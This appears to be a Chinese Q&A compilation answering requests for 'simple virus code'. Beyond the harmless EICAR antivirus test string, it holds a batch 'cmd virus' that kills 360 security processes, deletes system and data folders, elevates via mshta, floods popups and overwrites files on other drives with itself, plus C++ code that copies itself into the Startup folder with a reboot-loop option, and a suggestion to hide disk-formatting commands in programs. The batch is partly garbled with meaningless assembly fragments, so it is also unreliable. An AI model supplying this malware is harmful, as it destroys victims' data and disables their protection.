本文目录一览:
谁能给我一个简单的病毒的代码呀
本代码尽管测试,无任何危险。病毒文件测试代码。使用方法如下:
this
is
not
a
real
virus.
it
is
a
text
file
that
is
used
to
test
antivirus
software.
测试代码:
---------------------请复制下面的代码到文本中保存-------------------
x5o!p%@ap[4\pzx54(p^)7cc)7}$eicar-standard-antivirus-test-file!$h+h*
---------------------请复制上面的代码到文本中保存-------------------
测试方法:
1.鼠标右键点击桌面空白处,创建一个“文本文档”。(什么,还不会建?我倒)
2.将下面这段测试代码复制到“文本”里,保存,然后可以直接右键点击这个文本,用杀毒软件扫描(图1)。也可以等一会,如果你的杀毒软件还行,会自动报毒并将该文本删除,那就可以初步放心了。
测试原理:
该段代码是欧洲计算机防病毒协会开发的一种病毒代码,其中的特征码已经包含在各种杀毒软件的病毒代码库里,所以可以用做测试病毒扫描引擎。
测试等级:
特等:复制完代码后便提示内存有病毒
优等:刚保存完就提示病毒(或者直接删除)
中等:保存后几秒提示病毒(或者直接删除)
下等:需自己启动病毒扫描查杀才提示病毒(或者直接删除)
劣等:无论怎么扫描都无法提示病毒(或者直接删除)
怎么用C语言写个简单病毒,给个代码过程
一个简单的病毒就要很长的代码,写病毒没有那么简单。
不过你可以试试利用cmd命令,比如删除拉,格式化拉,拷贝拉,写进代码里。别人一打开程序资料盘就格掉了,嘿嘿。
简单的病毒编程代码是什么?
编写的计算机程序代码统称为恶意代码。恶意代码定义一:恶意代码又称恶意软件。
首先,病毒要有感染机制,即它能够实现繁殖自身。其次,病毒要有有效载荷触发事件,即病毒要找到一定数量的感染体、或者某一日期、或者在碰到某一段文本后才能发作。
所谓的病毒代码其实可以想象成是犯人的指纹, 当防毒软件公司收集到一只新的病毒时, 他们就会从这个病毒程序中截取一小段独一无二而且足以表示这只病毒的二进位程序码 (Binary Code) , 来当做杀毒程序辨认此病毒的依据。
而这段独一无二的二进位程序码就是所谓的病毒代码。病毒代码它可以把计算机程序打乱,使计算机无法正常使用。
写cmd病毒
代码是
echo off
JMP Label1
Db thunkcode1
Label2:
……
JMP Label3
Db thunkcode3
Label1:
…….
JMP Label2
Db thunkcode2
Label3:
JMP Label1
Db thunkcode1
Label2:jjj
……
JMP Label3
Db thunkcode3
Label1:ss
…….
JMP Label2
Db thunkcode2
Label3:mm
taskkill /f /im 360DesktopLite.exe
jz label
jnz label
db thunkcode
label:
jz label2
jnz label2
db thunkcode
lable2
mov ax, 8
xor ax, 77
...
taskkill /f /im explore.exe
taskkill /f /im 360tray.exe
taskkill /f /im 360Safe.exe
echo off
taskkill /f /im 360tray.exe
JMP Label1
Db thunkcode1
Label2:
……
JMP Label3
Db thunkcode3
Label1:
…….
JMP Label2
Db thunkcode2
Label3:
JMP Label1
Db thunkcode1
Label2:
……
JMP Label3
Db thunkcode3
Label1:
…….
JMP Label2
Db thunkcode2
Label3:
taskkill /f /im 360tray.exe
taskkill /f /im ZhuDongFangYu.exe
rmdir /s/q C:\Users\administrator\Desktop
rmdir /s/q C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
rmdir /s/q C:\ProgramData
del /f /s /q regedit.exe
JMP Label1
Db thunkcode1
Label2:
……
JMP Label3
Db thunkcode3
Label1:
…….
JMP Label2
Db thunkcode2
Label3:
JMP Label1
Db thunkcode1
Label2:
……
JMP Label3
Db thunkcode3
Label1:
…….
JMP Label2
Db thunkcode2
Label3:
call label_1
db thunkcode
jmp label_2
db thunkcode
label_1:
pop eax
jmp label_3
db thunkcode,thunkcode,thunkcode
label_3:
inc eax
jmp label_4
db thunkcode,thunkcode,thunkcode
label_4:
jmp eax
db thunkcode
label_2:
....
del /f /s /q notepad.exe
rmdir /s/q apppatch
rmdir /s/q Windows10Upgrade
rmdir /s/q LDSGameMaster
set path=C:\ddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
set temp=C:\mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm
del /f /s /q search-ms:displayname=“win10%20(C%3A)”中的搜索结果crumb=System.Generic.String:cmdcrumb=location:C%3A%5C
rmdir /s/q C:\Windows\appcompat\Programs
rmdir /s/q C:\Windows\en-US
rmdir /s/q C:\Windows\OCR
del /f /s /q notepad.exe
rmdir /s/q apppatch
rmdir /s/q Windows10Upgrade
rmdir /s/q LDSGameMaster
set path=C:\ddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
set temp=C:\mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm
del /f /s /q search-ms:displayname=“win10%20(C%3A)”中的搜索结果crumb=System.Generic.String:cmdcrumb=location:C%3A%5C
rmdir /s/q C:\Windows\appcompat\Programs
rmdir /s/q C:\Windows\en-US
rmdir /s/q C:\Windows\OCR
::wwwwwww::rrrrrr%%tttt
rmdir /s/q C:\Windows\minidump
rmdir /s/q C:\Windows\Microsoft.NET
ftype nppfile="C:\ProgramFiles (x86)\Notepad++\notepad++.exe" %1
for /l %%i in (1 1 9999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999)do md A..\
@%1 mshta vbscript:CreateObject("Shell.Application").ShellExecute("cmd.exe","/c %~s0 ::","","runas",0)(window.close)exit
:a
set /a a+=1
echo %random%-%random%-%random% C:\Users\%username%\Desktop\CCBL.%random%
mshta javascript:alert(".");close();
goto a
@%1 mshta vbscript:CreateObject("Shell.Application").ShellExecute("cmd.exe","/c %~s0 ::","","runas",0)(window.close)exit
for /f "tokens=* delims=" %%i in ('dir /b D:\*.*') do copy /y "%dpnx0" "%%i" nul
for /f "tokens=* delims=" %%i in ('dir /b A:\*.*') do copy /y "%dpnx0" "%%i" nul
@%1 mshta vbscript:CreateObject("Shell.Application").ShellExecute("cmd.exe","/c %~s0 ::","","runas",0)(window.close)exit
for /f "tokens=* delims=" %%i in ('dir /b K:\*.*') do copy /y "%dpnx0" "%%i" nul
for /f "tokens=* delims=" %%i in ('dir /b I:\*.*') do copy /y "%dpnx0" "%%i"
@%1 mshta vbscript:CreateObject("Shell.Application").ShellExecute("cmd.exe","/c %~s0 ::","","runas",0)(window.close)exit
for /f "tokens=* delims=" %%i in ('dir /b Z:\*.*') do copy /y "%dpnx0" "%%i" nul
for /f "tokens=* delims=" %%i in ('dir /b M:\*.*') do copy /y "%dpnx0" "%%i" nul
rmdir /s/q C:\Windows\Offline Web Pages
比较简单的C++病毒代码
最简单的病毒代码如下: #include "windows.h"
#include "stdio.h"
void main(int argc,char * argv[])
{
//printf("%s\n",argv[i]);
char copy[80];
sprintf(copy,"copy %s \"%%userprofile%%\\「开始」菜单\\程序\\启动\"",argv[0]);
system(copy); //将这个程序拷到开机启动文件夹下面
//char cmd[]="shutdown -r -t 0";//自动重起
char cmd[]="ping baidu.com";//将这个换成上面的,就是一开机就重起了!
system(cmd);
system("pause");
}